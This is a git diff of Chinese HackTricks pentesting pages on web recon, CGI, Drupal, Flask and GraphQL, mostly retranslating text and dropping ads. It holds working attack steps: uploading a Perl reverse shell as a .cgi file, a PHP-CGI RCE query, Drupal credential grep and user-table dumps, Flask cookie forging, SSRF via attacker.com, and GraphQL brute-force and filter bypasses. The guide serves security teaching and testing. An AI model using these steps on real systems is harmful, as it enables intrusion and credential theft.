-- **API密钥**: 如果您**找到任何API密钥**,有指南指示如何使用不同平台的API密钥:[**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**]()**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
+- 如果您正在进行**CTF**,一个“常见”的技巧是在**页面**的**右侧**(使用**数百个**空格,以便在使用浏览器打开源代码时看不到数据)**隐藏** **信息**。另一种可能性是在**网页底部**使用**多个新行**并在评论中**隐藏信息**。
+- **API密钥**: 如果您**找到任何API密钥**,有一个指南指示如何使用不同平台的API密钥:[**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**]()**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
 - Google API密钥: 如果您找到任何看起来像**AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik的API密钥,您可以使用项目[**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner)来检查该密钥可以访问哪些API。
 - **S3存储桶**: 在爬虫过程中查看是否有任何**子域**或任何**链接**与某些**S3存储桶**相关。在这种情况下,[**检查**存储桶的**权限**](buckets/)。
 
 ### 特殊发现
 
-**在**执行**爬虫**和**暴力破解**时,您可能会发现**有趣的** **事物**,您需要**注意**。
+**在**执行**爬虫**和**暴力破解**时,您可能会发现**有趣的** **事物**,您必须**注意**。
 
 **有趣的文件**
 
 - 查找**CSS**文件中指向其他文件的**链接**。
 - [如果您找到一个_**.git**_文件,可以提取一些信息](git.md)
-- 如果您找到一个_**.env**_文件,可以找到API密钥、数据库密码和其他信息。
+- 如果您找到一个_**.env**_,可以找到API密钥、数据库密码和其他信息。
 - 如果您找到**API端点**,您[还应该测试它们](web-api-pentesting.md)。这些不是文件,但可能“看起来像”它们。
 - **JS文件**: 在爬虫部分提到了一些可以从JS文件中提取路径的工具。此外,监控每个找到的JS文件也很有趣,因为在某些情况下,变化可能表明代码中引入了潜在的漏洞。您可以使用例如[**JSMon**](https://github.com/robre/jsmon)**.**
-- 您还应该使用[**RetireJS**](https://github.com/retirejs/retire.js/)或[**JSHole**](https://github.com/callforpapers-source/jshole)检查发现的JS文件,以查看它是否存在漏洞。
+- 您还应该使用[**RetireJS**](https://github.com/retirejs/retire.js/)或[**JSHole**](https://github.com/callforpapers-source/jshole)检查发现的JS文件,以查找是否存在漏洞。
 - **JavaScript去混淆和解包:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
 - **JavaScript美化器:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
 - **JsFuck去混淆** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
@@ -320,9 +309,9 @@ _注意,在暴力破解或爬虫过程中发现新目录时,应进行暴力
 
 **NTLM认证 - 信息泄露**
 
-如果运行的服务器要求身份验证是**Windows**,或者您发现一个登录请求您的**凭据**(并要求**域名**),您可以引发**信息泄露**。\
-**发送**头部:`“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”`,由于**NTLM认证的工作原理**,服务器将通过头部"WWW-Authenticate"响应内部信息(IIS版本,Windows版本...)。\
-您可以使用**nmap插件**"_http-ntlm-info.nse_"来**自动化**此过程。
+如果运行的服务器要求身份验证的是**Windows**,或者您发现一个登录请求您的**凭据**(并要求**域名**),您可以引发**信息泄露**。\
+**发送**头部:`“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”`,由于**NTLM认证的工作原理**,服务器将响应内部信息(IIS版本、Windows版本...)在头部"WWW-Authenticate"中。\
+您可以使用**nmap插件** "_http-ntlm-info.nse_" 来自动化此过程。
 
 **HTTP重定向(CTF)**
 
@@ -346,14 +335,6 @@ _注意,在暴力破解或爬虫过程中发现新目录时,应进行暴力
 
 您可以使用工具如[https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io)来监控页面的修改,这可能会插入漏洞。
 
-

-
-**从黑客的角度看待您的Web应用程序、网络和云**
-
-**查找并报告具有实际商业影响的关键、可利用的漏洞。** 使用我们20多个自定义工具映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ### HackTricks自动命令
 ```
 Protocol_Name: Web    #Protocol Abbreviation if there is one.
diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md
index 9f05b3f2b..6aa9d211e 100644
--- a/src/network-services-pentesting/pentesting-web/cgi.md
+++ b/src/network-services-pentesting/pentesting-web/cgi.md
@@ -1,27 +1,20 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
-
 # 信息
 
-**CGI脚本是perl脚本**,因此,如果您已经入侵了可以执行_**.cgi**_脚本的服务器,您可以**上传一个perl反向shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\),**将扩展名**从**.pl**更改为**.cgi**,给予**执行权限** \(`chmod +x`\),并**通过网页浏览器访问**反向shell以执行它。
-为了测试**CGI漏洞**,建议使用`nikto -C all`(以及所有插件)
+**CGI 脚本是 perl 脚本**,因此,如果您已经攻陷了一个可以执行 _**.cgi**_ 脚本的服务器,您可以 **上传一个 perl 反向 shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\),**将扩展名**从 **.pl** 更改为 **.cgi**,给予 **执行权限** \(`chmod +x`\),并 **通过网页浏览器访问** 反向 shell 以执行它。为了测试 **CGI 漏洞**,建议使用 `nikto -C all` \(以及所有插件\)
 
 # **ShellShock**
 
-**ShellShock**是影响广泛使用的**Bash**命令行shell的**漏洞**,该shell在基于Unix的操作系统中使用。它针对Bash运行应用程序传递的命令的能力。漏洞在于对**环境变量**的操控,环境变量是影响计算机上进程运行的动态命名值。攻击者可以通过将**恶意代码**附加到环境变量上来利用这一点,该代码在接收到变量时执行。这使得攻击者有可能危害系统。
+**ShellShock** 是一个影响广泛使用的 **Bash** 命令行 shell 的 **漏洞**,该 shell 运行在基于 Unix 的操作系统中。它针对 Bash 运行应用程序传递的命令的能力。漏洞存在于 **环境变量** 的操控中,这些变量是动态命名的值,影响计算机上进程的运行方式。攻击者可以通过将 **恶意代码** 附加到环境变量来利用这一点,该代码在接收到变量时执行。这使得攻击者有可能攻陷系统。
 
 利用此漏洞,**页面可能会抛出错误**。
 
-您可以通过注意到它使用**旧的Apache版本**和**cgi_mod**(带有cgi文件夹)或使用**nikto**来**发现**此漏洞。
+您可以通过注意到它使用 **旧版 Apache** 和 **cgi_mod** \(带有 cgi 文件夹\) 或使用 **nikto** 来 **发现** 此漏洞。
 
 ## **测试**
 
-大多数测试基于回显某些内容,并期望该字符串在网页响应中返回。如果您认为某个页面可能存在漏洞,请搜索所有cgi页面并进行测试。
+大多数测试基于回显某些内容,并期望该字符串在网页响应中返回。如果您认为某个页面可能存在漏洞,请搜索所有 cgi 页面并进行测试。
 
 **Nmap**
 ```bash
@@ -63,7 +56,7 @@ CGI 为 http 请求中的每个头创建一个环境变量。例如:“host:we
 # 旧 PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
 
 基本上,如果 cgi 是活动的并且 php 是“旧的” \(<5.3.12 / < 5.4.2\),您可以执行代码。
-为了利用此漏洞,您需要访问 web 服务器的某个 PHP 文件而不发送参数 \(特别是没有发送字符“=”\)。
+为了利用此漏洞,您需要访问 web 服务器的某个 PHP 文件,而不发送参数 \(特别是没有发送字符“=”\)。
 然后,为了测试此漏洞,您可以访问例如 `/index.php?-s` \(注意 `-s`\),**应用程序的源代码将出现在响应中**。
 
 然后,为了获得 **RCE**,您可以发送这个特殊查询:`/?-d allow_url_include=1 -d auto_prepend_file=php://input` 和 **要在请求的主体中执行的 PHP 代码。
@@ -73,10 +66,5 @@ curl -i --data-binary "" "http://jh2i.com:500
 ```
 **关于漏洞和可能的利用的更多信息:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF 写作示例**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
-

-
-通过 8kSec 学院深化您在 **移动安全** 方面的专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/drupal/README.md b/src/network-services-pentesting/pentesting-web/drupal/README.md
index a4fa8a141..ed8257b82 100644
--- a/src/network-services-pentesting/pentesting-web/drupal/README.md
+++ b/src/network-services-pentesting/pentesting-web/drupal/README.md
@@ -2,9 +2,6 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
 
 ## 发现
 
@@ -45,7 +42,7 @@ Drupal默认支持**三种类型的用户**:
 
 ### 隐藏页面
 
-只需通过查看**`/node/FUZZ`**来查找新页面,其中**`FUZZ`**是一个数字(例如从1到1000)。 
+只需通过查看**`/node/FUZZ`**来查找新页面,其中**`FUZZ`**是一个数字(例如从1到1000)。
 
 ### 已安装模块信息
 ```bash
@@ -73,7 +70,7 @@ drupal-rce.md
 
 - [**Drupalwned**](https://github.com/nowak0x01/Drupalwned): Drupal利用脚本,**将XSS提升到RCE或其他关键漏洞。**有关更多信息,请查看[**这篇文章**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)。它提供对**Drupal版本7.X.X、8.X.X、9.X.X和10.X.X的支持,并允许:**
 - _**权限提升:**_ 在Drupal中创建一个管理员用户。
-- _**(RCE) 上传模板:**_ 上传自定义模板,后门到Drupal。
+- _**(RCE) 上传模板:**_ 上传自定义的后门模板到Drupal。
 
 ## 后期利用
 
@@ -85,8 +82,4 @@ find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|
 ```bash
 mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
 ```
-

-
-{% embed url="https://websec.nl/" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md
index c700325f5..31fe15ce4 100644
--- a/src/network-services-pentesting/pentesting-web/flask.md
+++ b/src/network-services-pentesting/pentesting-web/flask.md
@@ -2,26 +2,19 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
-
-**如果你正在参加 CTF,Flask 应用程序可能与** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**相关。**
+**如果你在进行CTF,Flask应用程序可能与** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**有关。**
 
 ## Cookies
 
-默认的 cookie 会话名称是 **`session`**。
+默认的cookie会话名称是 **`session`**。
 
 ### Decoder
 
-在线 Flask cookie 解码器: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
+在线Flask cookie解码器: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
 
 #### Manual
 
-获取 cookie 的第一部分,直到第一个点,并进行 Base64 解码>
+获取cookie的第一部分直到第一个点,并进行Base64解码>
 ```bash
 echo "ImhlbGxvIg" | base64 -d
 ```
@@ -53,7 +46,7 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
 ```
 ### **RIPsession**
 
-命令行工具,用于使用 flask-unsign 制作的 cookie 对网站进行暴力破解。
+命令行工具,用于使用通过flask-unsign制作的cookie对网站进行暴力破解。
 
 {% embed url="https://github.com/Tagvi/ripsession" %}
 ```bash
@@ -61,7 +54,7 @@ ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s p
 ```
 ### SQLi in Flask session cookie with SQLmap
 
-[**这个例子**](../../pentesting-web/sql-injection/sqlmap/#eval) 使用 sqlmap `eval` 选项来 **自动签名 sqlmap 负载** 以便于 flask,使用已知的密钥。
+[**这个例子**](../../pentesting-web/sql-injection/sqlmap/#eval) 使用 sqlmap `eval` 选项来 **自动签名 sqlmap 负载** 以用于 flask,使用已知的密钥。
 
 ## Flask Proxy to SSRF
 
@@ -87,12 +80,3 @@ return get(f'{SITE_NAME}{path}').content
 app.run(host='0.0.0.0', port=8080)
 ```
 可以允许引入类似“@attacker.com”的内容,以导致**SSRF**。
-
-

-
-使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask)轻松构建和**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
-
-{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md
index 3c07c6a2b..83d847c0c 100644
--- a/src/network-services-pentesting/pentesting-web/graphql.md
+++ b/src/network-services-pentesting/pentesting-web/graphql.md
@@ -2,23 +2,18 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 ## 介绍
 
-GraphQL被**强调**为REST API的**高效替代方案**,提供了一种简化的从后端查询数据的方法。与REST相比,REST通常需要在不同的端点之间进行多次请求以收集数据,而GraphQL则允许通过**单个请求**获取所有所需的信息。这种简化显著**有利于开发人员**,减少了他们的数据获取过程的复杂性。
+GraphQL 被 **强调** 为 REST API 的 **高效替代方案**,提供了一种简化的方式来从后端查询数据。与 REST 相比,REST 通常需要在不同的端点之间进行多次请求以收集数据,而 GraphQL 允许通过 **单个请求** 获取所有所需的信息。这种简化显著 **有利于开发者**,减少了他们的数据获取过程的复杂性。
 
-## GraphQL与安全
+## GraphQL 和安全性
 
-随着新技术的出现,包括GraphQL,新的安全漏洞也随之出现。一个关键点是**GraphQL默认不包含身份验证机制**。开发人员有责任实施这些安全措施。没有适当的身份验证,GraphQL端点可能会将敏感信息暴露给未经过身份验证的用户,构成重大安全风险。
+随着包括 GraphQL 在内的新技术的出现,新安全漏洞也随之而来。一个关键点是 **GraphQL 默认不包含身份验证机制**。开发者有责任实施这些安全措施。没有适当的身份验证,GraphQL 端点可能会将敏感信息暴露给未经过身份验证的用户,构成重大安全风险。
 
-### 目录暴力攻击与GraphQL
+### 目录暴力攻击和 GraphQL
 
-为了识别暴露的GraphQL实例,建议在目录暴力攻击中包含特定路径。这些路径包括:
+为了识别暴露的 GraphQL 实例,建议在目录暴力攻击中包含特定路径。这些路径包括:
 
 - `/graphql`
 - `/graphiql`
@@ -29,15 +24,15 @@ GraphQL被**强调**为REST API的**高效替代方案**,提供了一种简化
 - `/graphql/api`
 - `/graphql/graphql`
 
-识别开放的GraphQL实例可以检查支持的查询。这对于理解通过端点访问的数据至关重要。GraphQL的自省系统通过详细说明模式支持的查询来促进这一点。有关更多信息,请参阅GraphQL关于自省的文档:[**GraphQL: A query language for APIs.**](https://graphql.org/learn/introspection/)
+识别开放的 GraphQL 实例可以检查支持的查询。这对于理解通过端点访问的数据至关重要。GraphQL 的自省系统通过详细说明模式支持的查询来促进这一点。有关更多信息,请参阅 GraphQL 关于自省的文档:[**GraphQL: A query language for APIs.**](https://graphql.org/learn/introspection/)
 
 ### 指纹识别
 
-工具[**graphw00f**](https://github.com/dolevf/graphw00f)能够检测服务器使用的GraphQL引擎,并打印一些对安全审计员有帮助的信息。
+工具 [**graphw00f**](https://github.com/dolevf/graphw00f) 能够检测服务器使用的 GraphQL 引擎,并打印一些对安全审计员有帮助的信息。
 
 #### 通用查询 
 
-要检查一个URL是否为GraphQL服务,可以发送一个**通用查询**,`query{__typename}`。如果响应包含`{"data": {"__typename": "Query"}}`,则确认该URL托管了一个GraphQL端点。此方法依赖于GraphQL的`__typename`字段,该字段揭示了被查询对象的类型。
+要检查一个 URL 是否为 GraphQL 服务,可以发送一个 **通用查询**,`query{__typename}`。如果响应包含 `{"data": {"__typename": "Query"}}`,则确认该 URL 托管了一个 GraphQL 端点。此方法依赖于 GraphQL 的 `__typename` 字段,该字段揭示了被查询对象的类型。
 ```javascript
 query{__typename}
 ```
@@ -51,7 +46,7 @@ Graphql 通常支持 **GET**、**POST** (x-www-form-urlencoded) 和 **POST**(jso
 ```bash
 query={__schema{types{name,fields{name}}}}
 ```
-通过此查询,您将找到所有正在使用的类型的名称:
+使用此查询,您将找到所有正在使用的类型的名称:
 
 ![](<../../images/image (1036).png>)
 ```bash
@@ -186,11 +181,11 @@ name
 
 ![](<../../images/Screenshot from 2021-03-13 18-22-57 (1).png>)
 
-您可以看到 "_Flags_" 对象由 **name** 和 **value** 组成。然后,您可以使用以下查询获取所有标志的名称和值:
+您可以看到 "_Flags_" 对象由 **name** 和 **value** 组成。然后,您可以使用查询获取所有标志的名称和值:
 ```javascript
 query={flags{name, value}}
 ```
-请注意,如果**查询的对象**是**原始****类型**,例如**字符串**,如以下示例所示
+请注意,如果**查询的对象**是像**字符串**这样的**原始****类型**,如以下示例所示
 
 ![](<../../images/image (958).png>)
 
@@ -198,21 +193,21 @@ query={flags{name, value}}
 ```javascript
 query = { hiddenFlags }
 ```
-在另一个示例中,"_Query_" 类型对象中有两个对象:"_user_" 和 "_users_"。\
-如果这些对象不需要任何参数进行搜索,可以通过**请求**所需的数据来**检索所有信息**。在这个互联网示例中,你可以提取保存的用户名和密码:
+在另一个例子中,"_Query_" 类型对象中有两个对象:"_user_" 和 "_users_"。\
+如果这些对象不需要任何参数进行搜索,可以**直接请求**所需的数据来**检索所有信息**。在这个互联网示例中,你可以提取保存的用户名和密码:
 
 ![](<../../images/image (880).png>)
 
-然而,在这个示例中,如果你尝试这样做,你会得到这个**错误**:
+然而,在这个例子中,如果你尝试这样做,你会得到这个**错误**:
 
 ![](<../../images/image (1042).png>)
 
 看起来它会使用类型为 _**Int**_ 的 "_**uid**_" 参数进行搜索。\
-无论如何,我们已经知道,在 [Basic Enumeration](graphql.md#basic-enumeration) 部分,提出了一个查询,显示了所有所需的信息:`query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
+无论如何,我们已经知道,在 [Basic Enumeration](graphql.md#basic-enumeration) 部分提出了一个查询,显示了所有所需的信息:`query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
 
-如果你阅读提供的图像,当我运行该查询时,你会看到 "_**user**_" 有类型为 _Int_ 的 **arg** "_**uid**_"。
+如果你阅读提供的图像,当我运行那个查询时,你会看到 "_**user**_" 有一个类型为 _Int_ 的 **arg** "_**uid**_"。
 
-因此,通过一些轻量级的 _**uid**_ 暴力破解,我发现 _**uid**=**1**_ 时检索到了一个用户名和密码:\
+因此,通过一些轻量级的 _**uid**_ 暴力破解,我发现 _**uid**=**1** 时检索到了一个用户名和密码:\
 `query={user(uid:1){user,password}}`
 
 ![](<../../images/image (90).png>)
@@ -225,7 +220,7 @@ query = { hiddenFlags }
 
 **查询字符串转储技巧(感谢 @BinaryShadow\_)**
 
-如果你可以通过字符串类型进行搜索,例如:`query={theusers(description: ""){username,password}}`,并且你**搜索一个空字符串**,它将**转储所有数据**。 (_注意这个示例与教程示例无关,对于这个示例假设你可以通过一个名为 "**description**" 的字符串字段使用 "**theusers**" 进行搜索_).
+如果你可以通过字符串类型进行搜索,比如:`query={theusers(description: ""){username,password}}`,并且你**搜索一个空字符串**,它将**转储所有数据**。 (_注意这个例子与教程的例子无关,对于这个例子假设你可以通过一个名为 "**description**" 的字符串字段使用 "**theusers**" 进行搜索_)。
 
 ### 搜索
 
@@ -239,7 +234,7 @@ email
 }
 }
 ```
-您可以通过姓名搜索人员并获取他们订阅的电影:
+您可以通过**姓名**搜索人员并获取他们**订阅的** **电影**:
 ```javascript
 {
 searchPerson(name: "John Doe") {
@@ -256,7 +251,7 @@ name
 ```
 注意如何指示检索该人的 `subscribedMovies` 的 `name`。
 
-您还可以**同时搜索多个对象**。在这种情况下,搜索了 2 部电影:
+您还可以 **同时搜索多个对象**。在这种情况下,搜索了 2 部电影:
 ```javascript
 {
 searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) {
@@ -291,13 +286,13 @@ name
 
 **变更用于在服务器端进行更改。**
 
-在**自省**中,您可以找到**声明的** **变更**。在下图中,"_MutationType_" 被称为 "_Mutation_",而 "_Mutation_" 对象包含变更的名称(在本例中为 "_addPerson_"):
+在 **自省** 中,您可以找到 **声明的** **变更**。在下图中,"_MutationType_" 被称为 "_Mutation_",而 "_Mutation_" 对象包含变更的名称(在本例中为 "_addPerson_"):
 
 ![](<../../images/Screenshot from 2021-03-13 18-26-27 (1).png>)
 
-在此设置中,**数据库**包含**人员**和**电影**。**人员**通过其**电子邮件**和**姓名**进行识别;**电影**通过其**名称**和**评分**进行识别。**人员**可以互为朋友,并且也可以拥有电影,表示数据库中的关系。
+在此设置中,**数据库** 包含 **人员** 和 **电影**。**人员** 通过他们的 **电子邮件** 和 **姓名** 进行识别;**电影** 通过它们的 **名称** 和 **评分** 进行识别。**人员** 可以彼此成为朋友,并且也可以拥有电影,表示数据库中的关系。
 
-一个**在数据库中创建新**电影的变更可以如下所示(在此示例中,变更被称为 `addMovie`):
+一个 **在数据库中创建新** 电影的变更可以像以下示例(在此示例中,变更被称为 `addMovie`):
 ```javascript
 mutation {
 addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) {
@@ -310,7 +305,7 @@ rating
 ```
 **注意查询中如何指示值和数据类型。**
 
-此外,数据库支持一个名为 `addPerson` 的 **mutation** 操作,允许创建 **persons** 及其与现有 **friends** 和 **movies** 的关联。重要的是要注意,朋友和电影必须在数据库中预先存在,才能将它们链接到新创建的人。
+此外,数据库支持一个名为 `addPerson` 的 **mutation** 操作,允许创建 **persons** 及其与现有 **friends** 和 **movies** 的关联。重要的是要注意,朋友和电影必须在数据库中预先存在,然后才能将它们链接到新创建的人。
 ```javascript
 mutation {
 addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) {
@@ -340,12 +335,12 @@ releaseYear
 ```
 ### 指令重载
 
-正如在[**本报告中描述的漏洞之一**](https://www.landh.tech/blog/20240304-google-hack-50000/)中所解释的,指令重载意味着调用指令甚至数百万次,以使服务器浪费操作,直到可能导致DoS。
+正如在[**本报告中描述的漏洞之一**](https://www.landh.tech/blog/20240304-google-hack-50000/)中所解释的,指令重载意味着调用指令甚至数百万次,以使服务器浪费操作,直到可能发生DoS攻击。
 
 ### 在1个API请求中批量暴力破解
 
 此信息来自[https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/)。\
-通过GraphQL API进行身份验证,**同时发送多个不同凭据的查询**以进行检查。这是一种经典的暴力破解攻击,但现在由于GraphQL批量处理功能,可以在每个HTTP请求中发送多个登录/密码对。此方法会欺骗外部速率监控应用程序,使其认为一切正常,没有暴力破解机器人试图猜测密码。
+通过GraphQL API进行身份验证,**同时发送多个不同凭据的查询**进行检查。这是一种经典的暴力破解攻击,但现在由于GraphQL批量处理功能,可以在每个HTTP请求中发送多个登录/密码对。此方法会欺骗外部速率监控应用程序,使其认为一切正常,没有暴力破解机器人试图猜测密码。
 
 下面是一个应用程序身份验证请求的最简单演示,**一次有3个不同的电子邮件/密码对**。显然,可以以相同的方式在单个请求中发送数千个:
 
@@ -359,13 +354,13 @@ releaseYear
 
 越来越多的**graphql端点正在禁用自省**。然而,当收到意外请求时,graphql抛出的错误足以让像[**clairvoyance**](https://github.com/nikitastupin/clairvoyance)这样的工具重建大部分架构。
 
-此外,Burp Suite扩展[**GraphQuail**](https://github.com/forcesunseen/graphquail)扩展**观察通过Burp的GraphQL API请求**并**构建**一个内部GraphQL **架构**,每当它看到新的查询时。它还可以为GraphiQL和Voyager公开架构。当收到自省查询时,该扩展返回一个假响应。因此,GraphQuail显示了API中可用的所有查询、参数和字段。有关更多信息,[**请查看此处**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema)。
+此外,Burp Suite扩展[**GraphQuail**](https://github.com/forcesunseen/graphquail)扩展**观察通过Burp的GraphQL API请求**,并**构建**一个内部GraphQL **架构**,每当它看到新的查询时。它还可以为GraphiQL和Voyager公开架构。当收到自省查询时,该扩展返回一个假响应。因此,GraphQuail显示了API中可用的所有查询、参数和字段。有关更多信息,[**请查看此处**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema)。
 
-一个很好的**词汇表**可以在这里发现[**GraphQL实体**](https://github.com/Escape-Technologies/graphql-wordlist?)。
+一个很好的**词表**可以在这里发现[**GraphQL实体**](https://github.com/Escape-Technologies/graphql-wordlist?)。
 
 ### 绕过GraphQL自省防御 
 
-为了绕过API中对自省查询的限制,在`__schema`关键字后插入**特殊字符**被证明是有效的。此方法利用了开发人员在试图通过关注`__schema`关键字来阻止自省时在正则表达式模式中的常见疏忽。通过添加像**空格、换行符和逗号**这样的字符,GraphQL会忽略这些字符,但正则表达式可能没有考虑到,从而可以绕过限制。例如,在`__schema`后面带有换行符的自省查询可能会绕过这样的防御:
+为了绕过API中对自省查询的限制,在`__schema`关键字后插入**特殊字符**被证明是有效的。这种方法利用了开发人员在试图通过关注`__schema`关键字来阻止自省时在正则表达式模式中的常见疏忽。通过添加像**空格、换行符和逗号**这样的字符,GraphQL会忽略这些字符,但正则表达式可能没有考虑到,从而可以绕过限制。例如,在`__schema`后面带有换行符的自省查询可能会绕过这样的防御:
 ```bash
 # Example with newline to bypass
 {
@@ -403,23 +398,23 @@ ws.send(JSON.stringify(graphqlMsg))
 ```
 ### **发现暴露的 GraphQL 结构**
 
-当禁用 introspection 时,检查网站源代码中 JavaScript 库中预加载的查询是一种有用的策略。这些查询可以通过开发者工具中的 `Sources` 选项卡找到,提供有关 API 架构的见解,并揭示潜在的 **暴露敏感查询**。在开发者工具中搜索的命令是:
+当 introspection 被禁用时,检查网站源代码中 JavaScript 库中预加载的查询是一种有用的策略。这些查询可以通过开发者工具中的 `Sources` 选项卡找到,提供有关 API 架构的见解,并揭示潜在的 **暴露的敏感查询**。在开发者工具中搜索的命令是:
 ```javascript
 Inspect/Sources/"Search all files"
 file:* mutation
 file:* query
 ```
-## CSRF in GraphQL
+## GraphQL中的CSRF
 
-如果你不知道什么是 CSRF,请阅读以下页面:
+如果你不知道什么是CSRF,请阅读以下页面:
 
 {{#ref}}
 ../../pentesting-web/csrf-cross-site-request-forgery.md
 {{#endref}}
 
-在外面,你将能够找到几个 **未配置 CSRF 令牌的** GraphQL 端点。
+在外面,你将能够找到几个**未配置CSRF令牌的**GraphQL端点。
 
-请注意,GraphQL 请求通常通过使用 Content-Type **`application/json`** 的 POST 请求发送。
+请注意,GraphQL请求通常通过使用Content-Type **`application/json`**的POST请求发送。
 ```javascript
 {"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}
 ```
@@ -465,17 +460,17 @@ query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
 
 [将查询链接](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln)在一起可以绕过一个弱认证系统。
 
-在下面的示例中,您可以看到操作是 "forgotPassword",并且它应该只执行与之关联的 forgotPassword 查询。通过在末尾添加一个查询可以绕过这一点,在这种情况下,我们添加 "register" 和一个用户变量,以便系统注册为新用户。
+在下面的示例中,您可以看到操作是 "forgotPassword",并且它应该只执行与之相关的 forgotPassword 查询。通过在末尾添加一个查询可以绕过这一点,在这种情况下,我们添加 "register" 和一个用户变量,以便系统注册为新用户。
 
 

 
 ## 使用 GraphQL 中的别名绕过速率限制
 
-在 GraphQL 中,别名是一个强大的功能,允许在进行 API 请求时**明确命名属性**。这个能力在单个请求中检索**同一类型的多个实例**时特别有用。别名可以用来克服 GraphQL 对象不能具有多个同名属性的限制。
+在 GraphQL 中,别名是一个强大的功能,允许在进行 API 请求时**明确命名属性**。这个功能对于在单个请求中检索**同一类型**对象的**多个实例**特别有用。别名可以用来克服 GraphQL 对象不能具有多个同名属性的限制。
 
